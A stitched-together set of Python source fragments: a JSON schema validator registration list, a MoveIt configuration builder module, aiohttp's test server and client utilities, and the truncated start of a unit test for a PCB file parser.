JSONSchemaValidatorD1F92A9024975E9DAd6114255Be546Bd_v3_1_1()
self.json_schema_validators['jsd_d524614e122d53d68324daf1681eb753_v3_1_1'] =\
JSONSchemaValidatorD524614E122D53D68324Daf1681Eb753_v3_1_1()
self.json_schema_validators['jsd_d9cc879878ee5a34ac1c32f2f0cb8c6d_v3_1_1'] =\
JSONSchemaValidatorD9Cc879878Ee5A34Ac1C32F2F0Cb8C6D_v3_1_1()
self.json_schema_validators['jsd_d9ddc2557a495493bca08b8b973601aa_v3_1_1'] =\
JSONSchemaValidatorD9Ddc2557A495493Bca08B8B973601Aa_v3_1_1()
self.json_schema_validators['jsd_dd469dcee9445c72a3861ef94fb3b096_v3_1_1'] =\
JSONSchemaValidatorDd469DceE9445C72A3861Ef94Fb3B096_v3_1_1()
self.json_schema_validators['jsd_ded7f8573c255c318bb1f04bfdbf01e1_v3_1_1'] =\
JSONSchemaValidatorDed7F8573C255C318Bb1F04Bfdbf01E1_v3_1_1()
self.json_schema_validators['jsd_df9ab8ff636353279d5c787585dcb6af_v3_1_1'] =\
JSONSchemaValidatorDf9Ab8Ff636353279D5C787585Dcb6Af_v3_1_1()
self.json_schema_validators['jsd_dfaeea899c185169ae2a3b70b5491008_v3_1_1'] =\
JSONSchemaValidatorDfaeea899C185169Ae2A3B70B5491008_v3_1_1()
self.json_schema_validators['jsd_dfc44f7f24d153d789efa48e904b3832_v3_1_1'] =\
JSONSchemaValidatorDfc44F7F24D153D789EfA48E904B3832_v3_1_1()
self.json_schema_validators['jsd_e09287aba99c56a6a9171b7e3a635a43_v3_1_1'] =\
JSONSchemaValidatorE09287AbA99C56A6A9171B7E3A635A43_v3_1_1()
self.json_schema_validators['jsd_e2c930d3d75859b8b7d30e79f3eab084_v3_1_1'] =\
JSONSchemaValidatorE2C930D3D75859B8B7D30E79F3Eab084_v3_1_1()
self.json_schema_validators['jsd_e3110fc63ecb5428a075a8af8497fb35_v3_1_1'] =\
JSONSchemaValidatorE3110Fc63Ecb5428A075A8Af8497Fb35_v3_1_1()
self.json_schema_validators['jsd_e390313557e95aa9b8c2453d6f1de1e8_v3_1_1'] =\
JSONSchemaValidatorE390313557E95Aa9B8C2453D6F1De1E8_v3_1_1()
self.json_schema_validators['jsd_e39868ea7aec5efcaaf55009699eda5d_v3_1_1'] =\
JSONSchemaValidatorE39868Ea7Aec5EfcAaf55009699Eda5D_v3_1_1()
self.json_schema_validators['jsd_e3c62bba9f9e5344a38479f6437cf8b4_v3_1_1'] =\
JSONSchemaValidatorE3C62Bba9F9E5344A38479F6437Cf8B4_v3_1_1()
self.json_schema_validators['jsd_e405a20316825460a1f37a2f161e7ac5_v3_1_1'] =\
JSONSchemaValidatorE405A20316825460A1F37A2F161E7Ac5_v3_1_1()
self.json_schema_validators['jsd_e643a5ac8bca55f58ea8d6260c57eafe_v3_1_1'] =\
JSONSchemaValidatorE643A5Ac8Bca55F58Ea8D6260C57Eafe_v3_1_1()
self.json_schema_validators['jsd_e7bd468ee94f53869e52e84454efd0e6_v3_1_1'] =\
JSONSchemaValidatorE7Bd468EE94F53869E52E84454Efd0E6_v3_1_1()
self.json_schema_validators['jsd_e84705b918955b53afe61fc37911eb8b_v3_1_1'] =\
JSONSchemaValidatorE84705B918955B53Afe61Fc37911Eb8B_v3_1_1()
self.json_schema_validators['jsd_eaad68e7996c5562901de57bf5a0420a_v3_1_1'] =\
JSONSchemaValidatorEaad68E7996C5562901DE57Bf5A0420A_v3_1_1()
self.json_schema_validators['jsd_eae60ece5110590e97ddd910e8144ed2_v3_1_1'] =\
JSONSchemaValidatorEae60Ece5110590E97DdD910E8144Ed2_v3_1_1()
self.json_schema_validators['jsd_eae98db0c24b5ecca77cce8279e20785_v3_1_1'] =\
JSONSchemaValidatorEae98Db0C24B5EccA77CCe8279E20785_v3_1_1()
self.json_schema_validators['jsd_f1ff2b82953f5131884f0779db37190c_v3_1_1'] =\
JSONSchemaValidatorF1Ff2B82953F5131884F0779Db37190C_v3_1_1()
self.json_schema_validators['jsd_f24049df29d059c48eef86d381ffad5d_v3_1_1'] =\
JSONSchemaValidatorF24049Df29D059C48Eef86D381Ffad5D_v3_1_1()
self.json_schema_validators['jsd_f46c01449d585b088490c4db530c56d5_v3_1_1'] =\
JSONSchemaValidatorF46C01449D585B088490C4Db530C56D5_v3_1_1()
self.json_schema_validators['jsd_f4dbfb874b3b56d7a651d6732f1bd55e_v3_1_1'] =\
JSONSchemaValidatorF4Dbfb874B3B56D7A651D6732F1Bd55E_v3_1_1()
self.json_schema_validators['jsd_f65b1178749c5f2399a9d2395591dade_v3_1_1'] =\
JSONSchemaValidatorF65B1178749C5F2399A9D2395591Dade_v3_1_1()
self.json_schema_validators['jsd_f7227b280b745b94bb801369b168a529_v3_1_1'] =\
JSONSchemaValidatorF7227B280B745B94Bb801369B168A529_v3_1_1()
self.json_schema_validators['jsd_f7253733d7025c8b8459478b159e84fc_v3_1_1'] =\
JSONSchemaValidatorF7253733D7025C8B8459478B159E84Fc_v3_1_1()
self.json_schema_validators['jsd_f757b04825bb5c29a1b3475aae870d04_v3_1_1'] =\
JSONSchemaValidatorF757B04825Bb5C29A1B3475Aae870D04_v3_1_1()
self.json_schema_validators['jsd_f92e61297eb05379bd9b92bc60735912_v3_1_1'] =\
JSONSchemaValidatorF92E61297Eb05379Bd9B92Bc60735912_v3_1_1()
self.json_schema_validators['jsd_fbd772420b8851349aa58fb4a9b006b8_v3_1_1'] =\
JSONSchemaValidatorFbd772420B8851349Aa58Fb4A9B006B8_v3_1_1()
self.json_schema_validators['jsd_fc44ec6afaf95ea9b51dd404abf46e4e_v3_1_1'] =\
JSONSchemaValidatorFc44Ec6AFaf95Ea9B51DD404Abf46E4E_v3_1_1()
| |
"""Simplify loading moveit config parameters.
This module provides a builder-pattern based class to simplify loading MoveIt related parameters found in
robot_moveit_config package generated by moveit setup assistant.
By default it expects the following structure for the moveit configs package
robot_name_moveit_config/
.setup_assistant -> Used to retrieve information about the SRDF file and
the URDF file used when generating the package
config/
kinematics.yaml -> IK solver's parameters
joint_limits.yaml -> Overriding position/velocity/acceleration limits from the URDF file
moveit_cpp.yaml -> MoveItCpp related parameters
*_planning.yaml -> planning pipelines parameters
cartesian_limits.yaml -> Pilz planner parameters
# TODO(JafarAbdi): Check to see if this is a good default value
robot_name_controllers.yaml -> trajectory execution manager's parameters
...
Example:
moveit_configs = MoveItConfigsBuilder("robot_name").to_moveit_configs()
...
moveit_configs.package_path
moveit_configs.robot_description
moveit_configs.robot_description_semantic
moveit_configs.robot_description_kinematics
moveit_configs.planning_pipelines
moveit_configs.trajectory_execution
moveit_configs.planning_scene_monitor
moveit_configs.move_group_capabilities
moveit_configs.joint_limits
moveit_configs.moveit_cpp
moveit_configs.cartesian_limits
# Or to get all the parameters as a dictionary
moveit_configs.to_dict()
Each function in MoveItConfigsBuilder has a file_path as an argument which is used to override the default
path for the file
Example:
moveit_configs = MoveItConfigsBuilder("robot_name")
# Relative to robot_name_moveit_configs
.robot_description_semantic(Path("my_config") / "my_file.srdf")
.to_moveit_configs()
# Or
moveit_configs = MoveItConfigsBuilder("robot_name")
# Absolute path to robot_name_moveit_config
.robot_description_semantic(Path.home() / "my_config" / "new_file.srdf")
.to_moveit_configs()
"""
from pathlib import Path
from typing import Optional, List
import logging
import re
from ament_index_python.packages import get_package_share_directory
from launch_param_builder import ParameterBuilder, load_yaml, load_xacro
moveit_configs_utils_path = Path(get_package_share_directory("moveit_configs_utils"))
def get_pattern_matches(folder, pattern):
    """Collect entries of *folder* whose file names match *pattern*.

    For every regular file whose name matches, the first capture group is
    collected when the pattern defines groups; otherwise the file's path
    itself is collected. A non-existent folder yields an empty list.
    """
    if not folder.exists():
        return []
    results = []
    for entry in folder.iterdir():
        if not entry.is_file():
            continue
        found = pattern.search(entry.name)
        if found is None:
            continue
        # Prefer the first capture group; fall back to the path itself.
        results.append(found.groups()[0] if found.groups() else entry)
    return results
class MoveItConfigs(object):
    """Container for MoveIt related parameter dictionaries.

    Each attribute holds a dictionary of ROS parameters (empty until the
    corresponding MoveItConfigsBuilder method populates it). Access goes
    through the properties below, which read/write the private slots.
    """
    # One name-mangled slot per public property below.
    __slots__ = [
        "__package_path",
        "__robot_description",
        "__robot_description_semantic",
        "__robot_description_kinematics",
        "__planning_pipelines",
        "__trajectory_execution",
        "__planning_scene_monitor",
        "__move_group_capabilities",
        "__joint_limits",
        "__moveit_cpp",
        "__cartesian_limits",
    ]
    def __init__(self):
        # A pathlib Path to the moveit config package
        self.package_path = None
        # A dictionary that has the contents of the URDF file.
        self.robot_description = {}
        # A dictionary that has the contents of the SRDF file.
        self.robot_description_semantic = {}
        # A dictionary IK solver specific parameters.
        self.robot_description_kinematics = {}
        # A dictionary that contains the planning pipelines parameters.
        self.planning_pipelines = {}
        # A dictionary contains parameters for trajectory execution & moveit controller managers.
        self.trajectory_execution = {}
        # A dictionary that have the planning scene monitor's parameters.
        self.planning_scene_monitor = {}
        # A dictionary containing move_group's non-default capabilities.
        self.move_group_capabilities = {}
        # A dictionary containing the overridden position/velocity/acceleration limits.
        self.joint_limits = {}
        # A dictionary containing MoveItCpp related parameters.
        self.moveit_cpp = {}
        # A dictionary containing the cartesian limits for the Pilz planner.
        self.cartesian_limits = {}
    @property
    def package_path(self):
        return self.__package_path
    @package_path.setter
    def package_path(self, value):
        self.__package_path = value
    @property
    def robot_description(self):
        return self.__robot_description
    @robot_description.setter
    def robot_description(self, value):
        self.__robot_description = value
    @property
    def robot_description_semantic(self):
        return self.__robot_description_semantic
    @robot_description_semantic.setter
    def robot_description_semantic(self, value):
        self.__robot_description_semantic = value
    @property
    def robot_description_kinematics(self):
        return self.__robot_description_kinematics
    @robot_description_kinematics.setter
    def robot_description_kinematics(self, value):
        self.__robot_description_kinematics = value
    @property
    def planning_pipelines(self):
        return self.__planning_pipelines
    @planning_pipelines.setter
    def planning_pipelines(self, value):
        self.__planning_pipelines = value
    @property
    def trajectory_execution(self):
        return self.__trajectory_execution
    @trajectory_execution.setter
    def trajectory_execution(self, value):
        self.__trajectory_execution = value
    @property
    def planning_scene_monitor(self):
        return self.__planning_scene_monitor
    @planning_scene_monitor.setter
    def planning_scene_monitor(self, value):
        self.__planning_scene_monitor = value
    @property
    def move_group_capabilities(self):
        return self.__move_group_capabilities
    @move_group_capabilities.setter
    def move_group_capabilities(self, value):
        self.__move_group_capabilities = value
    @property
    def joint_limits(self):
        return self.__joint_limits
    @joint_limits.setter
    def joint_limits(self, value):
        self.__joint_limits = value
    @property
    def moveit_cpp(self):
        return self.__moveit_cpp
    @moveit_cpp.setter
    def moveit_cpp(self, value):
        self.__moveit_cpp = value
    @property
    def cartesian_limits(self):
        return self.__cartesian_limits
    @cartesian_limits.setter
    def cartesian_limits(self, value):
        self.__cartesian_limits = value
    def to_dict(self):
        """Merge all loaded parameter dictionaries into a single flat dict.

        NOTE(review): package_path (a Path, not a parameter dict) and
        move_group_capabilities are not merged here -- presumably
        intentional, but confirm before relying on to_dict() for them.
        """
        parameters = {}
        parameters.update(self.robot_description)
        parameters.update(self.robot_description_semantic)
        parameters.update(self.robot_description_kinematics)
        parameters.update(self.planning_pipelines)
        parameters.update(self.trajectory_execution)
        parameters.update(self.planning_scene_monitor)
        parameters.update(self.joint_limits)
        parameters.update(self.moveit_cpp)
        parameters.update(self.cartesian_limits)
        return parameters
class MoveItConfigsBuilder(ParameterBuilder):
__moveit_configs = MoveItConfigs()
__robot_name: str
__urdf_package: Path
# Relative path of the URDF file w.r.t. __urdf_package
__urdf_file_path: Path
# Relative path of the SRDF file w.r.t. robot_name_moveit_config
__srdf_file_path: Path
# String specify the parameter name that the robot description will be loaded to, it will also be used as a prefix
# for "_planning", "_semantic", and "_kinematics"
__robot_description: str
__config_dir_path = Path("config")
# Look-up for robot_name_moveit_config package
    def __init__(self, robot_name: str, robot_description="robot_description"):
        """Locate the robot's *_moveit_config package and record file paths.

        :param robot_name: Robot name; the package ``<robot_name>_moveit_config``
            must be findable through the base ParameterBuilder.
        :param robot_description: Parameter name the URDF is loaded under; also
            used as the prefix for "_semantic", "_kinematics" and "_planning".
        """
        super().__init__(robot_name + "_moveit_config")
        # NOTE(review): __moveit_configs is declared at class level, so it is
        # shared across MoveItConfigsBuilder instances -- confirm this is intended.
        self.__moveit_configs.package_path = self._package_path
        self.__robot_name = robot_name
        setup_assistant_file = self._package_path / ".setup_assistant"
        if not setup_assistant_file.exists():
            # No setup assistant metadata: fall back to the conventional
            # config/<robot_name>.urdf and config/<robot_name>.srdf locations.
            logging.warning(
                f"\x1b[33;21mPackage `{self._package_path}` doesn't have `.setup_assistant` file "
                f"-- using config/{robot_name}.urdf and config/{robot_name}.srdf\x1b[0m"
            )
            self.__urdf_package = self._package_path
            self.__urdf_file_path = self.__config_dir_path / (
                self.__robot_name + ".urdf"
            )
            self.__srdf_file_path = self.__config_dir_path / (
                self.__robot_name + ".srdf"
            )
        else:
            # Resolve URDF package + URDF/SRDF relative paths from the
            # setup assistant's recorded configuration.
            setup_assistant_yaml = load_yaml(setup_assistant_file)
            self.__urdf_package = Path(
                get_package_share_directory(
                    setup_assistant_yaml["moveit_setup_assistant_config"]["URDF"][
                        "package"
                    ]
                )
            )
            self.__urdf_file_path = Path(
                setup_assistant_yaml["moveit_setup_assistant_config"]["URDF"][
                    "relative_path"
                ]
            )
            self.__srdf_file_path = Path(
                setup_assistant_yaml["moveit_setup_assistant_config"]["SRDF"][
                    "relative_path"
                ]
            )
        self.__robot_description = robot_description
def robot_description(self, file_path: Optional[str] = None, mappings: dict = None):
"""Load robot description.
:param file_path: Absolute or relative path to the URDF file (w.r.t. robot_name_moveit_config).
:param mappings: mappings to be passed when loading the xacro file.
:return: Instance of MoveItConfigsBuilder with robot_description loaded.
"""
if file_path is None:
robot_description_file_path = self.__urdf_package / self.__urdf_file_path
else:
robot_description_file_path = self._package_path / file_path
self.__moveit_configs.robot_description = {
self.__robot_description: load_xacro(
robot_description_file_path, mappings=mappings
)
}
return self
def robot_description_semantic(
self, file_path: Optional[str] = None, mappings: dict = None
):
"""Load semantic robot description.
:param file_path: Absolute or relative path to the SRDF file (w.r.t. robot_name_moveit_config).
:param mappings: mappings to be passed when loading the xacro file.
:return: Instance of MoveItConfigsBuilder with robot_description_semantic loaded.
"""
self.__moveit_configs.robot_description_semantic = {
self.__robot_description
+ "_semantic": load_xacro(
self._package_path / (file_path or self.__srdf_file_path),
mappings=mappings,
)
}
return self
def robot_description_kinematics(self, file_path: Optional[str] = None):
"""Load IK solver parameters.
:param file_path: Absolute or relative path to the kinematics yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with robot_description_kinematics loaded.
"""
self.__moveit_configs.robot_description_kinematics = {
self.__robot_description
+ "_kinematics": load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "kinematics.yaml")
)
}
return self
def joint_limits(self, file_path: Optional[str] = None):
"""Load joint limits overrides.
:param file_path: Absolute or relative path to the joint limits yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with robot_description_planning loaded.
"""
self.__moveit_configs.joint_limits = {
self.__robot_description
+ "_planning": load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "joint_limits.yaml")
)
}
return self
def moveit_cpp(self, file_path: Optional[str] = None):
"""Load MoveItCpp parameters.
:param file_path: Absolute or relative path to the MoveItCpp yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with moveit_cpp loaded.
"""
self.__moveit_configs.moveit_cpp = load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "moveit_cpp.yaml")
)
return self
def trajectory_execution(
self,
file_path: Optional[str] = None,
moveit_manage_controllers: bool = True,
):
"""Load trajectory execution and moveit controller managers' parameters
:param file_path: Absolute or relative path to the controllers yaml file (w.r.t. robot_name_moveit_config).
:param moveit_manage_controllers: Whether trajectory execution manager is allowed to switch controllers' states.
:return: Instance of MoveItConfigsBuilder with trajectory_execution loaded.
"""
self.__moveit_configs.trajectory_execution = {
"moveit_manage_controllers": moveit_manage_controllers,
}
# Find the most likely controller params as needed
if file_path is None:
config_folder = self._package_path / self.__config_dir_path
controller_pattern = re.compile("^(.*)_controllers.yaml$")
possible_names = get_pattern_matches(config_folder, controller_pattern)
if not possible_names:
raise RuntimeError(
"trajectory_execution: `Parameter file_path is undefined "
f"and no matches for {config_folder}/*_controllers.yaml"
)
else:
chosen_name = None
if len(possible_names) == 1:
chosen_name = possible_names[0]
else:
# Try a couple other common names, in order of precedence
for name in ["moveit", "moveit2", self.__robot_name]:
if name in possible_names:
chosen_name = name
break
else:
option_str = "\n - ".join(
name + "_controllers.yaml" for name in possible_names
)
raise RuntimeError(
"trajectory_execution: "
f"Unable to guess which parameter file to load. Options:\n - {option_str}"
)
file_path = config_folder / (chosen_name + "_controllers.yaml")
else:
file_path = self._package_path / file_path
self.__moveit_configs.trajectory_execution.update(load_yaml(file_path))
return self
def planning_scene_monitor(
self,
publish_planning_scene: bool = True,
publish_geometry_updates: bool = True,
publish_state_updates: bool = True,
publish_transforms_updates: bool = True,
):
self.__moveit_configs.planning_scene_monitor = {
# TODO: Fix parameter namespace upstream -- see planning_scene_monitor.cpp:262
# "planning_scene_monitor": {
"publish_planning_scene": publish_planning_scene,
"publish_geometry_updates": publish_geometry_updates,
"publish_state_updates": publish_state_updates,
"publish_transforms_updates": publish_transforms_updates,
# }
}
return self
def planning_pipelines(
self,
default_planning_pipeline: str = None,
pipelines: List[str] = None,
load_all: bool = True,
):
"""Load planning pipelines parameters.
:param default_planning_pipeline: Name of the default planning pipeline.
:param pipelines: List of the planning pipelines to be loaded.
:param load_all: Only used if pipelines is None.
If true, loads all pipelines defined in | |
"""Utilities shared by tests."""
import asyncio
import contextlib
import functools
import gc
import inspect
import os
import socket
import sys
import unittest
from abc import ABC, abstractmethod
from types import TracebackType
from typing import ( # noqa
TYPE_CHECKING,
Any,
Callable,
Iterator,
List,
Optional,
Type,
Union,
)
from unittest import mock
from multidict import CIMultiDict, CIMultiDictProxy
from yarl import URL
import aiohttp
from aiohttp.client import (
ClientResponse,
_RequestContextManager,
_WSRequestContextManager,
)
from . import ClientSession, hdrs
from .abc import AbstractCookieJar
from .client_reqrep import ClientResponse # noqa
from .client_ws import ClientWebSocketResponse # noqa
from .helpers import sentinel
from .http import HttpVersion, RawRequestMessage
from .signals import Signal
from .web import (
Application,
AppRunner,
BaseRunner,
Request,
Server,
ServerRunner,
SockSite,
UrlMappingMatchInfo,
)
from .web_protocol import _RequestHandler
if TYPE_CHECKING: # pragma: no cover
from ssl import SSLContext
else:
SSLContext = None
REUSE_ADDRESS = os.name == "posix" and sys.platform != "cygwin"
def get_unused_port_socket(host: str) -> socket.socket:
    """Return a socket bound to an OS-assigned free port on *host*."""
    return get_port_socket(host, 0)
def get_port_socket(host: str, port: int) -> socket.socket:
    """Create a TCP socket bound to ``(host, port)``; port 0 picks a free one."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Windows has different semantics for SO_REUSEADDR, so only set it on
    # POSIX platforms (excluding cygwin). Ref:
    # https://docs.microsoft.com/en-us/windows/win32/winsock/using-so-reuseaddr-and-so-exclusiveaddruse
    if os.name == "posix" and sys.platform != "cygwin":
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    return sock
def unused_port() -> int:
    """Return a port that is unused on the current host."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Binding to port 0 asks the OS for any free port.
        probe.bind(("127.0.0.1", 0))
        return probe.getsockname()[1]
    finally:
        probe.close()
class BaseTestServer(ABC):
    """Base class for test servers: manages runner/socket lifecycle.

    Subclasses implement _make_runner() to supply the BaseRunner that
    serves requests. Use as an async context manager, or call
    start_server()/close() explicitly.
    """
    # Keep test collectors (pytest/nose) from treating this class as a test.
    __test__ = False
    def __init__(
        self,
        *,
        scheme: Union[str, object] = sentinel,
        loop: Optional[asyncio.AbstractEventLoop] = None,
        host: str = "127.0.0.1",
        port: Optional[int] = None,
        skip_url_asserts: bool = False,
        **kwargs: Any,
    ) -> None:
        # NOTE(review): extra **kwargs are accepted but ignored here.
        self._loop = loop
        self.runner = None  # type: Optional[BaseRunner]
        self._root = None  # type: Optional[URL]
        self.host = host
        self.port = port  # None/0 -> let the OS choose at start time
        self._closed = False
        self.scheme = scheme  # sentinel -> derived from ssl in start_server()
        self.skip_url_asserts = skip_url_asserts
    async def start_server(
        self, loop: Optional[asyncio.AbstractEventLoop] = None, **kwargs: Any
    ) -> None:
        """Create the runner, bind a socket and start serving (no-op if started)."""
        if self.runner:
            return
        self._loop = loop
        self._ssl = kwargs.pop("ssl", None)
        self.runner = await self._make_runner(**kwargs)
        await self.runner.setup()
        if not self.port:
            self.port = 0
        _sock = get_port_socket(self.host, self.port)
        self.host, self.port = _sock.getsockname()[:2]
        site = SockSite(self.runner, sock=_sock, ssl_context=self._ssl)
        await site.start()
        server = site._server
        assert server is not None
        sockets = server.sockets
        assert sockets is not None
        # Re-read the port actually bound (relevant when the OS picked it).
        self.port = sockets[0].getsockname()[1]
        if self.scheme is sentinel:
            if self._ssl:
                scheme = "https"
            else:
                scheme = "http"
            self.scheme = scheme
        self._root = URL(f"{self.scheme}://{self.host}:{self.port}")
    @abstractmethod  # pragma: no cover
    async def _make_runner(self, **kwargs: Any) -> BaseRunner:
        """Build the BaseRunner that will serve requests (subclass hook)."""
        pass
    def make_url(self, path: str) -> URL:
        """Return an absolute URL for *path* rooted at this server."""
        assert self._root is not None
        url = URL(path)
        if not self.skip_url_asserts:
            assert not url.is_absolute()
            return self._root.join(url)
        else:
            # Caller opted out of URL sanity checks: plain string concatenation.
            return URL(str(self._root) + path)
    @property
    def started(self) -> bool:
        # True once start_server() has created a runner.
        return self.runner is not None
    @property
    def closed(self) -> bool:
        # True once close() has completed.
        return self._closed
    @property
    def handler(self) -> Server:
        # for backward compatibility
        # web.Server instance
        runner = self.runner
        assert runner is not None
        assert runner.server is not None
        return runner.server
    async def close(self) -> None:
        """Close all fixtures created by this test server.
        After that point, the server is no longer usable.
        This is an idempotent function: running close multiple times
        will not have any additional effects.
        close is also run on exit when used as a(n) (async) context manager.
        """
        if self.started and not self.closed:
            assert self.runner is not None
            await self.runner.cleanup()
            self._root = None
            self.port = None
            self._closed = True
    def __enter__(self) -> None:
        # Synchronous context management is disallowed; use `async with`.
        raise TypeError("Use async with instead")
    def __exit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc_value: Optional[BaseException],
        traceback: Optional[TracebackType],
    ) -> None:
        # __exit__ should exist in pair with __enter__ but never executed
        pass  # pragma: no cover
    async def __aenter__(self) -> "BaseTestServer":
        await self.start_server(loop=self._loop)
        return self
    async def __aexit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc_value: Optional[BaseException],
        traceback: Optional[TracebackType],
    ) -> None:
        await self.close()
class TestServer(BaseTestServer):
    """Test server that runs an aiohttp web Application."""
    def __init__(
        self,
        app: Application,
        *,
        scheme: Union[str, object] = sentinel,
        host: str = "127.0.0.1",
        port: Optional[int] = None,
        **kwargs: Any,
    ):
        # Keep a handle on the application before delegating generic
        # server setup to the base class.
        self.app = app
        super().__init__(scheme=scheme, host=host, port=port, **kwargs)
    async def _make_runner(self, **kwargs: Any) -> BaseRunner:
        """Create the runner serving the wrapped application."""
        runner = AppRunner(self.app, **kwargs)
        return runner
class RawTestServer(BaseTestServer):
    """Test server that serves a low-level request handler directly."""
    def __init__(
        self,
        handler: _RequestHandler,
        *,
        scheme: Union[str, object] = sentinel,
        host: str = "127.0.0.1",
        port: Optional[int] = None,
        **kwargs: Any,
    ) -> None:
        self._handler = handler
        super().__init__(scheme=scheme, host=host, port=port, **kwargs)
    async def _make_runner(self, debug: bool = True, **kwargs: Any) -> ServerRunner:
        """Wrap the raw handler in a web Server and build its runner."""
        raw_server = Server(self._handler, loop=self._loop, debug=debug, **kwargs)
        return ServerRunner(raw_server, debug=debug, **kwargs)
class TestClient:
    """
    A test client implementation.

    To write functional tests for aiohttp based servers.
    """

    # Prevent pytest from collecting this class as a test suite.
    __test__ = False

    def __init__(
        self,
        server: BaseTestServer,
        *,
        cookie_jar: Optional[AbstractCookieJar] = None,
        loop: Optional[asyncio.AbstractEventLoop] = None,
        **kwargs: Any,
    ) -> None:
        if not isinstance(server, BaseTestServer):
            raise TypeError(
                "server must be TestServer " "instance, found type: %r" % type(server)
            )
        self._server = server
        self._loop = loop
        if cookie_jar is None:
            # unsafe=True accepts cookies from bare-IP hosts such as 127.0.0.1
            cookie_jar = aiohttp.CookieJar(unsafe=True, loop=loop)
        self._session = ClientSession(loop=loop, cookie_jar=cookie_jar, **kwargs)
        self._closed = False
        # Every response/websocket handed out is tracked so close() can
        # release it.
        self._responses = []  # type: List[ClientResponse]
        self._websockets = []  # type: List[ClientWebSocketResponse]

    async def start_server(self) -> None:
        """Start the wrapped test server on this client's loop."""
        await self._server.start_server(loop=self._loop)

    @property
    def host(self) -> str:
        """Host the test server is bound to."""
        return self._server.host

    @property
    def port(self) -> Optional[int]:
        """Port the test server listens on (None before start)."""
        return self._server.port

    @property
    def server(self) -> BaseTestServer:
        """The wrapped test server."""
        return self._server

    @property
    def app(self) -> Application:
        """The served Application, or None for raw (handler-only) servers."""
        return getattr(self._server, "app", None)

    @property
    def session(self) -> ClientSession:
        """An internal aiohttp.ClientSession.

        Unlike the methods on the TestClient, client session requests
        do not automatically include the host in the url queried, and
        will require an absolute path to the resource.
        """
        return self._session

    def make_url(self, path: str) -> URL:
        """Return an absolute URL for *path* on the test server."""
        return self._server.make_url(path)

    async def _request(self, method: str, path: str, **kwargs: Any) -> ClientResponse:
        resp = await self._session.request(method, self.make_url(path), **kwargs)
        # save it to close later
        self._responses.append(resp)
        return resp

    def request(self, method: str, path: str, **kwargs: Any) -> _RequestContextManager:
        """Routes a request to tested http server.

        The interface is identical to aiohttp.ClientSession.request,
        except the loop kwarg is overridden by the instance used by the
        test server.
        """
        return _RequestContextManager(self._request(method, path, **kwargs))

    def get(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP GET request."""
        return _RequestContextManager(self._request(hdrs.METH_GET, path, **kwargs))

    def post(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP POST request."""
        return _RequestContextManager(self._request(hdrs.METH_POST, path, **kwargs))

    def options(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP OPTIONS request."""
        return _RequestContextManager(self._request(hdrs.METH_OPTIONS, path, **kwargs))

    def head(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP HEAD request."""
        return _RequestContextManager(self._request(hdrs.METH_HEAD, path, **kwargs))

    def put(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP PUT request."""
        return _RequestContextManager(self._request(hdrs.METH_PUT, path, **kwargs))

    def patch(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP PATCH request."""
        return _RequestContextManager(self._request(hdrs.METH_PATCH, path, **kwargs))

    def delete(self, path: str, **kwargs: Any) -> _RequestContextManager:
        """Perform an HTTP DELETE request."""
        return _RequestContextManager(self._request(hdrs.METH_DELETE, path, **kwargs))

    def ws_connect(self, path: str, **kwargs: Any) -> _WSRequestContextManager:
        """Initiate websocket connection.

        The api corresponds to aiohttp.ClientSession.ws_connect.
        """
        return _WSRequestContextManager(self._ws_connect(path, **kwargs))

    async def _ws_connect(self, path: str, **kwargs: Any) -> ClientWebSocketResponse:
        ws = await self._session.ws_connect(self.make_url(path), **kwargs)
        self._websockets.append(ws)
        return ws

    async def close(self) -> None:
        """Close all fixtures created by the test client.

        After that point, the TestClient is no longer usable.

        This is an idempotent function: running close multiple times
        will not have any additional effects.

        close is also run on exit when used as a(n) (asynchronous)
        context manager.
        """
        if not self._closed:
            for resp in self._responses:
                resp.close()
            for ws in self._websockets:
                await ws.close()
            await self._session.close()
            await self._server.close()
            self._closed = True

    def __enter__(self) -> None:
        raise TypeError("Use async with instead")

    def __exit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc: Optional[BaseException],
        tb: Optional[TracebackType],
    ) -> None:
        # __exit__ should exist in pair with __enter__ but never executed
        pass  # pragma: no cover

    async def __aenter__(self) -> "TestClient":
        await self.start_server()
        return self

    async def __aexit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc: Optional[BaseException],
        tb: Optional[TracebackType],
    ) -> None:
        await self.close()
class AioHTTPTestCase(unittest.TestCase):
"""A base class to allow for unittest web applications using
aiohttp.
Provides the following:
* self.client (aiohttp.test_utils.TestClient): an aiohttp test client.
* self.loop (asyncio.BaseEventLoop): the event loop in which the
application and server are running.
* self.app (aiohttp.web.Application): the application returned by
self.get_application()
Note that the TestClient's methods are asynchronous: you have to
execute function on the test client using asynchronous methods.
"""
async def get_application(self) -> Application:
    """
    This method should be overridden
    to return the aiohttp.web.Application
    object to test.
    """
    # Default delegates to the legacy synchronous hook for older subclasses.
    return self.get_app()
def get_app(self) -> Application:
    """Obsolete method used to construct the web application.

    Use the .get_application() coroutine instead.
    """
    raise RuntimeError("Did you forget to define get_application()?")
| |
<gh_stars>0
import sys
import unittest
from sys import path
from unittest.mock import patch
from nukleus.ModelBase import *
from nukleus.Schema import Schema
from nukleus.ModelPcb import *
from nukleus.ParserVisitor import ParserVisitor
from nukleus.PCB import PCB
from nukleus.SexpParser import *
sys.path.append('src')
sys.path.append('../../src')
class TestModelPcb(unittest.TestCase):
def test_parse_general(self):
    """A `general` node must reach PCB.visitPcbGeneral as a PcbGeneral."""
    general_sexp = """ (general
(thickness 1.6)
(drawings 4)
